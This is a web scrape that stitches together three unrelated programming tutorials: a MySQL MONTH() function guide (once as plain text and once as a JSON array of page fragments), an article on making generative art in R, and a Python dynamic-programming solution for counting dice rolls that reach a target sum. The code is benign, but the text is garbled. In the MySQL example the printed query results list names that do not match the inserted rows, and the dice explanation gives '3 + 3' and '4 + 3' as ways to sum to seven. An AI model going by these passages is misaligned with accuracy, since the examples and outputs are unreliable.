2018-12-30 10:49:27 | 6000 | 12 | +-------------+--------------+---------------------+-------+--------------------------+ 5 rows in set (0.00 sec) Suppose we have created a table named SubscriberDetails with 5 records in it using the following queries – mysql> CREATE TABLE SubscriberDetails ( SubscriberName VARCHAR(255), PackageName VARCHAR(255), SubscriptionTimeStamp timestamp ); insert into SubscriberDetails values('Raja', 'Premium', TimeStamp('2020-10-21 20:53:49')); insert into SubscriberDetails values('Roja', 'Basic', TimeStamp('2020-11-26 10:13:19')); insert into SubscriberDetails values('Puja', 'Moderate', TimeStamp('2021-03-07 05:43:20')); insert into SubscriberDetails values('Vanaja', 'Basic', TimeStamp('2021-02-21 16:36:39')); insert into SubscriberDetails values('Jalaja', 'Premium', TimeStamp('2021-01-30 12:45:45')); Following query retrieves and displays the subscription month for all the records — mysql> SELECT SubscriberName, PackageName, SubscriptionTimeStamp, MONTH(SubscriptionTimeStamp) FROM SubscriberDetails; -----------------+-------------+-----------------------+------------------------------+ | SubscriberName | PackageName | SubscriptionTimeStamp | MONTH(SubscriptionTimeStamp) | +----------------+-------------+-----------------------+------------------------------+ | Ram | Premium | 2020-10-21 20:53:49 | 10 | | Rahman | Basic | 2020-11-26 10:13:19 | 11 | | Robert | Moderate | 2021-03-07 05:43:20 | 3 | | Radha | Basic | 2021-02-21 16:36:39 | 2 | | Rajiya | Premium | 2021-01-30 12:45:45 | 1 | +----------------+-------------+-----------------------+------------------------------+ 5 rows in set (0.00 sec) 31 Lectures 6 hours Eduonix Learning Solutions 84 Lectures 5.5 hours Frahaan Hussain 6 Lectures 3.5 hours DATAhill Solutions Srinivas Reddy 60 Lectures 10 hours Vijay Kumar Parvatha Reddy 10 Lectures 1 hours Harshit Srivastava 25 Lectures 4 hours Trevoir Williams Print Add Notes Bookmark this page
[ { "code": null, "e": 2664, "s": 2333, "text": "The DATE, DATETIME and TIMESTAMP datatypes in MySQL are used to store the date, date and time, time stamp values respectively. Where a time stamp is a numerical value representing the number of milliseconds from '1970-01-01 00:00:01' UTC (epoch) to the specified time. MySQL provides a set of functions to manipulate these values." }, { "code": null, "e": 2883, "s": 2664, "text": "The MYSQL MONTH() function is used to retrieve and return the MONTH of the given date or, date time expression. This function returns a numerical value ranging from 1 to 12 representing the month (January to December)." }, { "code": null, "e": 2931, "s": 2883, "text": "Following is the syntax of the above function –" }, { "code": null, "e": 2945, "s": 2931, "text": "MONTH(date);\n" }, { "code": null, "e": 3018, "s": 2945, "text": "Where, date is the date value from which you need to retrieve the month." }, { "code": null, "e": 3085, "s": 3018, "text": "Following example demonstrates the usage of the MONTH() function –" }, { "code": null, "e": 3264, "s": 3085, "text": "mysql> SELECT MONTH('2019-05-25');\n+---------------------+\n| MONTH('2019-05-25') |\n+---------------------+\n| 5 |\n+---------------------+\n1 row in set (0.18 sec)" }, { "code": null, "e": 3312, "s": 3264, "text": "Following is another example of this function –" }, { "code": null, "e": 3491, "s": 3312, "text": "mysql> SELECT MONTH('2008-09-17');\n+---------------------+\n| MONTH('2008-09-17') |\n+---------------------+\n| 9 |\n+---------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 3559, "s": 3491, "text": "If the month value in the given date is 0 this function returns 0 —" }, { "code": null, "e": 3917, "s": 3559, "text": "mysql> SELECT MONTH('2017-00-00');\n+---------------------+\n| MONTH('2017-00-00') |\n+---------------------+\n| 0|\n+---------------------+\n1 row in set (0.00 sec)\nmysql> SELECT MONTH('1789-00-07');\n+---------------------+\n| MONTH('1789-00-07') |\n+---------------------+\n| 0 |\n+---------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 4010, "s": 3917, "text": "If you pass an empty string or a non-string value as an argument this function returns NULL." }, { "code": null, "e": 4318, "s": 4010, "text": "mysql> SELECT MONTH('');\n+-----------+\n| MONTH('') |\n+-----------+\n| NULL |\n+-----------+\n1 row in set, 1 warning (0.00 sec)\nmysql> SELECT MONTH(1990-11-11);\n+-------------------+\n| MONTH(1990-11-11) |\n+-------------------+\n| NULL |\n+-------------------+\n1 row in set, 1 warning (0.00 sec)" }, { "code": null, "e": 4394, "s": 4318, "text": "We can also pass the date-time expression as an argument to this function –" }, { "code": null, "e": 4657, "s": 4394, "text": "mysql> SELECT MONTH('2015-09-05 09:40:45.2300');\n+-----------------------------------+\n| MONTH('2015-09-05 09:40:45.2300') |\n+-----------------------------------+\n| 9 |\n+-----------------------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 4743, "s": 4657, "text": "In the following example we are retrieving the month (number) from the current date —" }, { "code": null, "e": 4904, "s": 4743, "text": "mysql> SELECT MONTH(CURDATE());\n+------------------+\n| MONTH(CURDATE()) |\n+------------------+\n| 7 |\n+------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 4995, "s": 4904, "text": "In the following example we are retrieving the month (number) from the current timestamp —" }, { "code": null, "e": 5216, "s": 4995, "text": "mysql> SELECT MONTH(CURRENT_TIMESTAMP());\n+----------------------------+\n| MONTH(CURRENT_TIMESTAMP()) |\n+----------------------------+\n| 7 |\n+----------------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 5383, "s": 5216, "text": "You can also pass the column name as an argument to this function. Let us create a table with name MyPlayers in MySQL database using CREATE statement as shown below –" }, { "code": null, "e": 6354, "s": 5383, "text": "mysql> CREATE TABLE MyPlayers(\n\tID INT,\n\tFirst_Name VARCHAR(255),\n\tLast_Name VARCHAR(255),\n\tDate_Of_Birth date,\n\tPlace_Of_Birth VARCHAR(255),\n\tCountry VARCHAR(255),\n\tPRIMARY KEY (ID)\n);\nNow, we will insert 7 records in MyPlayers table using INSERT statements:\nmysql> insert into MyPlayers values(1, 'Shikhar', 'Dhawan', DATE('1981-12-05'), 'Delhi', 'India');\nmysql> insert into MyPlayers values(2, 'Jonathan', 'Trott', DATE('1981-04-22'), 'CapeTown', 'SouthAfrica');\nmysql> insert into MyPlayers values(3, 'Kumara', 'Sangakkara', DATE('1977-10-27'), 'Matale', 'Srilanka');\nmysql> insert into MyPlayers values(4, 'Virat', 'Kohli', DATE('1988-11-05'), 'Delhi', 'India');\nmysql> insert into MyPlayers values(5, 'Rohit', 'Sharma', DATE('1987-04-30'), 'Nagpur', 'India');\nmysql> insert into MyPlayers values(6, 'Ravindra', 'Jadeja', DATE('1988-12-06'), 'Nagpur', 'India');\nmysql> insert into MyPlayers values(7, 'James', 'Anderson', DATE('1982-06-30'), 'Burnley', 'England');" }, { "code": null, "e": 6485, "s": 6354, "text": "Following query retrieves and prints the month (number) from all the entities of the Date_Of_Birth column of the table MyPlayers —" }, { "code": null, "e": 7499, "s": 6485, "text": "mysql> SELECT First_Name, Last_Name, Date_Of_Birth, Country,\nMONTH(Date_Of_Birth) FROM MyPlayers;\n+------------+------------+---------------+-------------+----------------------+\n| First_Name | Last_Name | Date_Of_Birth | Country | MONTH(Date_Of_Birth) |\n+------------+------------+---------------+-------------+----------------------+\n| Shikhar | Dhawan | 1981-12-05 | India | 12 |\n| Jonathan | Trott | 1981-04-22 | SouthAfrica | 4 |\n| Kumara | Sangakkara | 1977-10-27 | Srilanka | 10 |\n| Virat | Kohli | 1988-11-05 | India | 11 |\n| Rohit | Sharma | 1987-04-30 | India | 4 |\n| Ravindra | Jadeja | 1988-12-06 | India | 12 |\n| James | Anderson | 1982-06-30 | England | 6 |\n+------------+------------+---------------+-------------+----------------------+\n7 rows in set (0.00 sec)" }, { "code": null, "e": 7604, "s": 7499, "text": "Suppose we have created a table named dispatches_data with 5 records in it using the following queries –" }, { "code": null, "e": 8325, "s": 7604, "text": "mysql> CREATE TABLE dispatches_data(\n\tProductName VARCHAR(255),\n\tCustomerName VARCHAR(255),\n\tDispatchTimeStamp timestamp,\n\tPrice INT,\n\tLocation VARCHAR(255)\n);\ninsert into dispatches_data values('Key-Board', 'Raja', TIMESTAMP('2019-05-04', '15:02:45'), 7000, 'Hyderabad');\ninsert into dispatches_data values('Earphones', 'Roja', TIMESTAMP('2019-06-26', '14:13:12'), 2000, 'Vishakhapatnam');\ninsert into dispatches_data values('Mouse', 'Puja', TIMESTAMP('2019-12-07', '07:50:37'), 3000, 'Vijayawada');\ninsert into dispatches_data values('Mobile', 'Vanaja' , TIMESTAMP ('2018-03-21', '16:00:45'), 9000, 'Chennai');\ninsert into dispatches_data values('Headset', 'Jalaja' , TIMESTAMP('2018-12-30', '10:49:27'), 6000, 'Goa');" }, { "code": null, "e": 8414, "s": 8325, "text": "Following query retrieves the month values (numbers) from the DispatchTimeStamp column —" }, { "code": null, "e": 9345, "s": 8414, "text": "mysql> SELECT ProductName, CustomerName, DispatchTimeStamp, Price,\nMONTH(DispatchTimeStamp) FROM dispatches_data;\n+-------------+--------------+---------------------+-------+--------------------------+\n| ProductName | CustomerName | DispatchTimeStamp | Price | MONTH(DispatchTimeStamp) |\n+-------------+--------------+---------------------+-------+--------------------------+\n| Key-Board | Raja | 2019-05-04 15:02:45 | 7000 | 5 |\n| Earphones | Roja | 2019-06-26 14:13:12 | 2000 | 6 |\n| Mouse | Puja | 2019-12-07 07:50:37 | 3000 | 12 |\n| Mobile | Vanaja | 2018-03-21 16:00:45 | 9000 | 3 |\n| Headset | Jalaja | 2018-12-30 10:49:27 | 6000 | 12 |\n+-------------+--------------+---------------------+-------+--------------------------+\n5 rows in set (0.00 sec)" }, { "code": null, "e": 9452, "s": 9345, "text": "Suppose we have created a table named SubscriberDetails with 5 records in it using the following queries –" }, { "code": null, "e": 10041, "s": 9452, "text": "mysql> CREATE TABLE SubscriberDetails (\n\tSubscriberName VARCHAR(255),\n\tPackageName VARCHAR(255),\n\tSubscriptionTimeStamp timestamp\n);\ninsert into SubscriberDetails values('Raja', 'Premium', TimeStamp('2020-10-21 20:53:49'));\ninsert into SubscriberDetails values('Roja', 'Basic', TimeStamp('2020-11-26 10:13:19'));\ninsert into SubscriberDetails values('Puja', 'Moderate', TimeStamp('2021-03-07 05:43:20'));\ninsert into SubscriberDetails values('Vanaja', 'Basic', TimeStamp('2021-02-21 16:36:39'));\ninsert into SubscriberDetails values('Jalaja', 'Premium', TimeStamp('2021-01-30 12:45:45'));" }, { "code": null, "e": 10125, "s": 10041, "text": "Following query retrieves and displays the subscription month for all the records —" }, { "code": null, "e": 11061, "s": 10125, "text": "mysql> SELECT SubscriberName, PackageName, SubscriptionTimeStamp,\nMONTH(SubscriptionTimeStamp) FROM SubscriberDetails;\n-----------------+-------------+-----------------------+------------------------------+\n| SubscriberName | PackageName | SubscriptionTimeStamp | MONTH(SubscriptionTimeStamp) |\n+----------------+-------------+-----------------------+------------------------------+\n| Ram | Premium | 2020-10-21 20:53:49 | 10 |\n| Rahman | Basic | 2020-11-26 10:13:19 | 11 |\n| Robert | Moderate | 2021-03-07 05:43:20 | 3 |\n| Radha | Basic | 2021-02-21 16:36:39 | 2 |\n| Rajiya | Premium | 2021-01-30 12:45:45 | 1 |\n+----------------+-------------+-----------------------+------------------------------+\n5 rows in set (0.00 sec)" }, { "code": null, "e": 11094, "s": 11061, "text": "\n 31 Lectures \n 6 hours \n" }, { "code": null, "e": 11122, "s": 11094, "text": " Eduonix Learning Solutions" }, { "code": null, "e": 11157, "s": 11122, "text": "\n 84 Lectures \n 5.5 hours \n" }, { "code": null, "e": 11174, "s": 11157, "text": " Frahaan Hussain" }, { "code": null, "e": 11208, "s": 11174, "text": "\n 6 Lectures \n 3.5 hours \n" }, { "code": null, "e": 11243, "s": 11208, "text": " DATAhill Solutions Srinivas Reddy" }, { "code": null, "e": 11277, "s": 11243, "text": "\n 60 Lectures \n 10 hours \n" }, { "code": null, "e": 11305, "s": 11277, "text": " Vijay Kumar Parvatha Reddy" }, { "code": null, "e": 11338, "s": 11305, "text": "\n 10 Lectures \n 1 hours \n" }, { "code": null, "e": 11358, "s": 11338, "text": " Harshit Srivastava" }, { "code": null, "e": 11391, "s": 11358, "text": "\n 25 Lectures \n 4 hours \n" }, { "code": null, "e": 11409, "s": 11391, "text": " Trevoir Williams" }, { "code": null, "e": 11416, "s": 11409, "text": " Print" }, { "code": null, "e": 11427, "s": 11416, "text": " Add Notes" } ]
Getting Started with Generative Art in R | by Vít Gabrhel | Towards Data Science
Generative art represents the involvement of a human-independent system (such as an algorithm) in a creative process. Such a system is a key element within the creative process, including its outputs. Unsurprisingly, there are many “tools” you can use if you want to delve into generative art. In case you want to have “hands-on” experience in R, there are two basic directions you can go. If you are a person proficient in working with code, you may write your code straight away. I dare to argue that this is the way of the “individual” expression as it allows for more flexibility, and, well, freedom. However, getting to that point takes time. Luckily, you can begin experimenting with your pieces of generative art by using one of the existing packages. Not only it could be quite rewarding, but it also works perfectly for grasping the basics of the “trade”. In this article, I am going to present to you some of the “ready-to-use” packages for making generative art. Also, I will tap into some of the examples of using general packages or libraries to arrive at the same goal. The first package I would like to present is called simply generativeart. One of its key features is the way how it structures the output files. In order to get the output files, you have to specify the location where they will be stored. Also, it iterates on the provided formula that doesn’t need to be supported with a seed. In this scenario, each of the outcome files is unique. Also, it is worth mentioning that the generativeart package is well documented and easy to use. library(generativeart) # devtools::install_github("cutterkom/generativeart")library(ambient)library(dplyr)# set the pathsIMG_DIR <- "img/"IMG_SUBDIR <- "everything/"IMG_SUBDIR2 <- "handpicked/"IMG_PATH <- paste0(IMG_DIR, IMG_SUBDIR)LOGFILE_DIR <- "logfile/"LOGFILE <- "logfile.csv"LOGFILE_PATH <- paste0(LOGFILE_DIR, LOGFILE)# create the directory structuregenerativeart::setup_directories(IMG_DIR, IMG_SUBDIR, IMG_SUBDIR2, LOGFILE_DIR)# include a specific formula, for example:my_formula <- list( x = quote(runif(1, -1, 10) * x_i^2 - sin(y_i^2)), y = quote(runif(1, -1, 10) * y_i^3 - cos(x_i^2) * y_i^4))# call the main function to create five images with a polar coordinate systemgenerativeart::generate_img(formula = my_formula, nr_of_img = 5, # set the number of iterations polar = TRUE, filetype = "png", color = "#c1a06e", background_color = "#1a3657") Danielle Navarro, the author of the Learning Statistics with R Learning Statistics with R handbook, is a well-known person among psychology students. Besides her teaching and research activities at the University of Adelaide, she also released the jasmines package, a tool allowing for creating a generative art in R. This package gives you an opportunity to play with simulation parameters (e.g. grain or interaction), shapes (e.g. entity_circle or scene_discs) and their modifications (like style_ribbon) or colours (palette or alpha). And noise, linked to the ambient library: library(dplyr) # or install.packages("dplyr") firstlibrary(jasmines) # or devtools::install_github("djnavarro/jasmines")p0 <- use_seed(100) %>% # Set the seed of R‘s random number generator, which is useful for creating simulations or random objects that can be reproduced. scene_discs( rings = 10, points = 50000, size = 50 ) %>% mutate(ind = 1:n()) %>% unfold_warp( iterations = 10, scale = .5, output = "layer" ) %>% unfold_tempest( iterations = 5, scale = .01 ) %>% style_ribbon( color = "#E0542E", colour = "ind", alpha = c(1,1), background = "#4D7186" )ggsave("p0.png", p0, width = 20, height = 20, units = "in") The mathart package wraps many commonly used algorithms into functions. One of such examples is the nearest neighbour graph, a visualisation of the k-d tree, a data structuring procedure of multidimensional space: library(mathart) # devtools::install_github("marcusvolz/mathart")library(ggart) # devtools::install_github("marcusvolz/ggart")library(ggforce)library(Rcpp)library(tidyverse)points <- mathart::pointsresult <- kdtree(points)p1 <- ggplot() + geom_segment(aes(x, y, xend = xend, yend = yend), result) + coord_equal() + xlim(0, 10000) + ylim(0, 10000) + theme_blankcanvas(bg_col = "#fafafa", margin_cm = 0)# save plotggsave("kdtree.png", p1, width = 20, height = 20, units = "in") mathart is a well-documented package. This fact widens the scope for experimenting. Maybe more importantly, by looking “under the hood”, the package improves understanding of data simulation. In many instances, previously mentioned packages built on more generally used packages such as magritr (the pipeline operator comes in handy even in the art creation), ggplot, dplyr, or purr. The k-d tree from the mathart package is no different. As we can see from the example of Marcus Volz, the original k-d tree algorithm can be tweaked using even base R: # Metropolis: Generative city visualisations# Packageslibrary(ggart)library(tidyverse)library(tweenr)library(viridis)# Make reproducibleset.seed(10001)# Parametersn <- 10000 # iterationsr <- 75 # neighbourhoodwidth <- 10000 # canvas widthheight <- 10000 # canvas heightdelta <- 2 * pi / 180 # angle direction noisep_branch <- 0.1 # probability of branchinginitial_pts <- 3 # number of initial pointsnframes <- 500 # number of tweenr frames# Initialise data framespoints <- data.frame(x = numeric(n), y = numeric(n), dir = numeric(n), level = integer(n))edges <- data.frame(x = numeric(n), y = numeric(n), xend = numeric(n), yend = numeric(n), level = integer(n))if(initial_pts > 1) { i <- 2 while(i <= initial_pts) { points[i, ] <- c(runif(1, 0, width), runif(1, 0, height), runif(1, -2*pi, 2*pi), 1) i <- i + 1 }}t0 <- Sys.time()# Main loop ----i <- initial_pts + 1while (i <= n) { valid <- FALSE while (!valid) { random_point <- sample_n(points[seq(1:(i-1)), ], 1) # Pick a point at random branch <- ifelse(runif(1, 0, 1) <= p_branch, TRUE, FALSE) alpha <- random_point$dir[1] + runif(1, -(delta), delta) + (branch * (ifelse(runif(1, 0, 1) < 0.5, -1, 1) * pi/2)) v <- c(cos(alpha), sin(alpha)) * r * (1 + 1 / ifelse(branch, random_point$level[1]+1, random_point$level[1])) # Create directional vector xj <- random_point$x[1] + v[1] yj <- random_point$y[1] + v[2] lvl <- random_point$level[1] lvl_new <- ifelse(branch, lvl+1, lvl) if(xj < 0 | xj > width | yj < 0 | yj > height) { next } points_dist <- points %>% mutate(d = sqrt((xj - x)^2 + (yj - y)^2)) if (min(points_dist$d) >= 1 * r) { points[i, ] <- c(xj, yj, alpha, lvl_new) edges[i, ] <- c(xj, yj, random_point$x[1], random_point$y[1], lvl_new) # Add a building if possible buiding <- 1 valid <- TRUE } } i <- i + 1 print(i)}edges <- edges %>% filter(level > 0)sand <- data.frame(alpha = numeric(0), x = numeric(0), y = numeric(0))perp <- data.frame(x = numeric(0), y = numeric(0), xend = numeric(0), yend = numeric(0))# Create plotp2 <- ggplot() + geom_segment(aes(x, y, xend = xend, yend = yend, size = -level), edges, lineend = "round") + #geom_segment(aes(x, y, xend = xend, yend = yend), perp, lineend = "round", alpha = 0.15) + #geom_point(aes(x, y), points) + #geom_point(aes(x, y), sand, size = 0.05, alpha = 0.05, colour = "black") + xlim(0, 10000) + ylim(0, 10000) + coord_equal() + scale_size_continuous(range = c(0.5, 0.5)) + #scale_color_viridis() + theme_blankcanvas(bg_col = "#fafafa", margin_cm = 0)# print plotggsave("plot007w.png", p2, width = 20, height = 20, units = "cm", dpi = 300) You don’t need to stop here. Some time spent playing with the code can easily end up by creating your distinct wall poster. Generative art demonstrates that code can be beautiful. If you are still not persuaded, go and see more elaborated works like these. Not only can generative art result in something astonishing, but it also helps you to understand the code itself. Interestingly, getting to the code underlying generative art may not be as easy as with other open-source areas. Some “generative artists” conclude not to share the code used in the creative process: “I do not share the code I use to create my pieces. The main reason for this is that I don’t think it would be beneficial to anyone. People interested in getting started with generative art would become to focused on my ideas instead of developing their own. Knowing the answer is the killer of creativity.” Thomas Lin Pedersen, Data Imaginist Regardless if we agree or not, generative art confronts us with ideas that are not that common in the world of coding. So, what are your ideas on the matter? Do you have any favourite generative artists? Or maybe your pieces of art you would like to share? Feel free to discuss this on Twitter. Originally published at https://www.data-must-flow.com.
[ { "code": null, "e": 373, "s": 172, "text": "Generative art represents the involvement of a human-independent system (such as an algorithm) in a creative process. Such a system is a key element within the creative process, including its outputs." }, { "code": null, "e": 562, "s": 373, "text": "Unsurprisingly, there are many “tools” you can use if you want to delve into generative art. In case you want to have “hands-on” experience in R, there are two basic directions you can go." }, { "code": null, "e": 777, "s": 562, "text": "If you are a person proficient in working with code, you may write your code straight away. I dare to argue that this is the way of the “individual” expression as it allows for more flexibility, and, well, freedom." }, { "code": null, "e": 1037, "s": 777, "text": "However, getting to that point takes time. Luckily, you can begin experimenting with your pieces of generative art by using one of the existing packages. Not only it could be quite rewarding, but it also works perfectly for grasping the basics of the “trade”." }, { "code": null, "e": 1256, "s": 1037, "text": "In this article, I am going to present to you some of the “ready-to-use” packages for making generative art. Also, I will tap into some of the examples of using general packages or libraries to arrive at the same goal." }, { "code": null, "e": 1330, "s": 1256, "text": "The first package I would like to present is called simply generativeart." }, { "code": null, "e": 1639, "s": 1330, "text": "One of its key features is the way how it structures the output files. In order to get the output files, you have to specify the location where they will be stored. Also, it iterates on the provided formula that doesn’t need to be supported with a seed. In this scenario, each of the outcome files is unique." }, { "code": null, "e": 1735, "s": 1639, "text": "Also, it is worth mentioning that the generativeart package is well documented and easy to use." }, { "code": null, "e": 2876, "s": 1735, "text": "library(generativeart) # devtools::install_github(\"cutterkom/generativeart\")library(ambient)library(dplyr)# set the pathsIMG_DIR <- \"img/\"IMG_SUBDIR <- \"everything/\"IMG_SUBDIR2 <- \"handpicked/\"IMG_PATH <- paste0(IMG_DIR, IMG_SUBDIR)LOGFILE_DIR <- \"logfile/\"LOGFILE <- \"logfile.csv\"LOGFILE_PATH <- paste0(LOGFILE_DIR, LOGFILE)# create the directory structuregenerativeart::setup_directories(IMG_DIR, IMG_SUBDIR, IMG_SUBDIR2, LOGFILE_DIR)# include a specific formula, for example:my_formula <- list( x = quote(runif(1, -1, 10) * x_i^2 - sin(y_i^2)), y = quote(runif(1, -1, 10) * y_i^3 - cos(x_i^2) * y_i^4))# call the main function to create five images with a polar coordinate systemgenerativeart::generate_img(formula = my_formula, nr_of_img = 5, # set the number of iterations polar = TRUE, filetype = \"png\", color = \"#c1a06e\", background_color = \"#1a3657\")" }, { "code": null, "e": 3026, "s": 2876, "text": "Danielle Navarro, the author of the Learning Statistics with R Learning Statistics with R handbook, is a well-known person among psychology students." }, { "code": null, "e": 3194, "s": 3026, "text": "Besides her teaching and research activities at the University of Adelaide, she also released the jasmines package, a tool allowing for creating a generative art in R." }, { "code": null, "e": 3456, "s": 3194, "text": "This package gives you an opportunity to play with simulation parameters (e.g. grain or interaction), shapes (e.g. entity_circle or scene_discs) and their modifications (like style_ribbon) or colours (palette or alpha). And noise, linked to the ambient library:" }, { "code": null, "e": 4124, "s": 3456, "text": "library(dplyr) # or install.packages(\"dplyr\") firstlibrary(jasmines) # or devtools::install_github(\"djnavarro/jasmines\")p0 <- use_seed(100) %>% # Set the seed of R‘s random number generator, which is useful for creating simulations or random objects that can be reproduced. scene_discs( rings = 10, points = 50000, size = 50 ) %>% mutate(ind = 1:n()) %>% unfold_warp( iterations = 10, scale = .5, output = \"layer\" ) %>% unfold_tempest( iterations = 5, scale = .01 ) %>% style_ribbon( color = \"#E0542E\", colour = \"ind\", alpha = c(1,1), background = \"#4D7186\" )ggsave(\"p0.png\", p0, width = 20, height = 20, units = \"in\")" }, { "code": null, "e": 4338, "s": 4124, "text": "The mathart package wraps many commonly used algorithms into functions. One of such examples is the nearest neighbour graph, a visualisation of the k-d tree, a data structuring procedure of multidimensional space:" }, { "code": null, "e": 4818, "s": 4338, "text": "library(mathart) # devtools::install_github(\"marcusvolz/mathart\")library(ggart) # devtools::install_github(\"marcusvolz/ggart\")library(ggforce)library(Rcpp)library(tidyverse)points <- mathart::pointsresult <- kdtree(points)p1 <- ggplot() + geom_segment(aes(x, y, xend = xend, yend = yend), result) + coord_equal() + xlim(0, 10000) + ylim(0, 10000) + theme_blankcanvas(bg_col = \"#fafafa\", margin_cm = 0)# save plotggsave(\"kdtree.png\", p1, width = 20, height = 20, units = \"in\")" }, { "code": null, "e": 5010, "s": 4818, "text": "mathart is a well-documented package. This fact widens the scope for experimenting. Maybe more importantly, by looking “under the hood”, the package improves understanding of data simulation." }, { "code": null, "e": 5202, "s": 5010, "text": "In many instances, previously mentioned packages built on more generally used packages such as magritr (the pipeline operator comes in handy even in the art creation), ggplot, dplyr, or purr." }, { "code": null, "e": 5370, "s": 5202, "text": "The k-d tree from the mathart package is no different. As we can see from the example of Marcus Volz, the original k-d tree algorithm can be tweaked using even base R:" }, { "code": null, "e": 8026, "s": 5370, "text": "# Metropolis: Generative city visualisations# Packageslibrary(ggart)library(tidyverse)library(tweenr)library(viridis)# Make reproducibleset.seed(10001)# Parametersn <- 10000 # iterationsr <- 75 # neighbourhoodwidth <- 10000 # canvas widthheight <- 10000 # canvas heightdelta <- 2 * pi / 180 # angle direction noisep_branch <- 0.1 # probability of branchinginitial_pts <- 3 # number of initial pointsnframes <- 500 # number of tweenr frames# Initialise data framespoints <- data.frame(x = numeric(n), y = numeric(n), dir = numeric(n), level = integer(n))edges <- data.frame(x = numeric(n), y = numeric(n), xend = numeric(n), yend = numeric(n), level = integer(n))if(initial_pts > 1) { i <- 2 while(i <= initial_pts) { points[i, ] <- c(runif(1, 0, width), runif(1, 0, height), runif(1, -2*pi, 2*pi), 1) i <- i + 1 }}t0 <- Sys.time()# Main loop ----i <- initial_pts + 1while (i <= n) { valid <- FALSE while (!valid) { random_point <- sample_n(points[seq(1:(i-1)), ], 1) # Pick a point at random branch <- ifelse(runif(1, 0, 1) <= p_branch, TRUE, FALSE) alpha <- random_point$dir[1] + runif(1, -(delta), delta) + (branch * (ifelse(runif(1, 0, 1) < 0.5, -1, 1) * pi/2)) v <- c(cos(alpha), sin(alpha)) * r * (1 + 1 / ifelse(branch, random_point$level[1]+1, random_point$level[1])) # Create directional vector xj <- random_point$x[1] + v[1] yj <- random_point$y[1] + v[2] lvl <- random_point$level[1] lvl_new <- ifelse(branch, lvl+1, lvl) if(xj < 0 | xj > width | yj < 0 | yj > height) { next } points_dist <- points %>% mutate(d = sqrt((xj - x)^2 + (yj - y)^2)) if (min(points_dist$d) >= 1 * r) { points[i, ] <- c(xj, yj, alpha, lvl_new) edges[i, ] <- c(xj, yj, random_point$x[1], random_point$y[1], lvl_new) # Add a building if possible buiding <- 1 valid <- TRUE } } i <- i + 1 print(i)}edges <- edges %>% filter(level > 0)sand <- data.frame(alpha = numeric(0), x = numeric(0), y = numeric(0))perp <- data.frame(x = numeric(0), y = numeric(0), xend = numeric(0), yend = numeric(0))# Create plotp2 <- ggplot() + geom_segment(aes(x, y, xend = xend, yend = yend, size = -level), edges, lineend = \"round\") + #geom_segment(aes(x, y, xend = xend, yend = yend), perp, lineend = \"round\", alpha = 0.15) + #geom_point(aes(x, y), points) + #geom_point(aes(x, y), sand, size = 0.05, alpha = 0.05, colour = \"black\") + xlim(0, 10000) + ylim(0, 10000) + coord_equal() + scale_size_continuous(range = c(0.5, 0.5)) + #scale_color_viridis() + theme_blankcanvas(bg_col = \"#fafafa\", margin_cm = 0)# print plotggsave(\"plot007w.png\", p2, width = 20, height = 20, units = \"cm\", dpi = 300)" }, { "code": null, "e": 8150, "s": 8026, "text": "You don’t need to stop here. Some time spent playing with the code can easily end up by creating your distinct wall poster." }, { "code": null, "e": 8283, "s": 8150, "text": "Generative art demonstrates that code can be beautiful. If you are still not persuaded, go and see more elaborated works like these." }, { "code": null, "e": 8597, "s": 8283, "text": "Not only can generative art result in something astonishing, but it also helps you to understand the code itself. Interestingly, getting to the code underlying generative art may not be as easy as with other open-source areas. Some “generative artists” conclude not to share the code used in the creative process:" }, { "code": null, "e": 8905, "s": 8597, "text": "“I do not share the code I use to create my pieces. The main reason for this is that I don’t think it would be beneficial to anyone. People interested in getting started with generative art would become to focused on my ideas instead of developing their own. Knowing the answer is the killer of creativity.”" }, { "code": null, "e": 8941, "s": 8905, "text": "Thomas Lin Pedersen, Data Imaginist" }, { "code": null, "e": 9060, "s": 8941, "text": "Regardless if we agree or not, generative art confronts us with ideas that are not that common in the world of coding." }, { "code": null, "e": 9236, "s": 9060, "text": "So, what are your ideas on the matter? Do you have any favourite generative artists? Or maybe your pieces of art you would like to share? Feel free to discuss this on Twitter." } ]
Number of Dice Rolls With Target Sum in Python
Suppose we have d dice, and each die has f number of faces numbered 1, 2, ..., f. We have to find the number of possible ways (out of fd total ways) modulo 10^9 + 7 to roll the dice so the sum of the face up numbers equal to the target. So if the input is like d = 2, f = 6, target = 7, then the output will be 6. So if we throw each dice with 6 faces, then there are 6 ways to get sum 6, as 1 + 6, 2 + 5, 3 + 3, 4 + 3, 5 + 2, 6 + 1. To solve this, we will follow these steps − m := 1e9 + 7 make a table dp of order d x (t + 1), and fill this with 0 for i in range 0 to d – 1for j in range 0 to tif i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m for j in range 0 to tif i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m if i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0 otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m for l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m if j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m return dp[d – 1, t] mod m Let us see the following implementation to get better understanding − Live Demo class Solution(object): def numRollsToTarget(self, d, f, t): mod = 1000000000+7 dp =[[0 for i in range(t+1)] for j in range(d)] for i in range(d): for j in range(t+1): if i == 0: dp[i][j] = 1 if j>=1 and j<=f else 0 else: for l in range(1,f+1): if j-l>0: dp[i][j]+=dp[i-1][j-l] dp[i][j]%=mod return dp [d-1][t] % mod ob = Solution() print(ob.numRollsToTarget(2,6,7)) 2 6 7 6
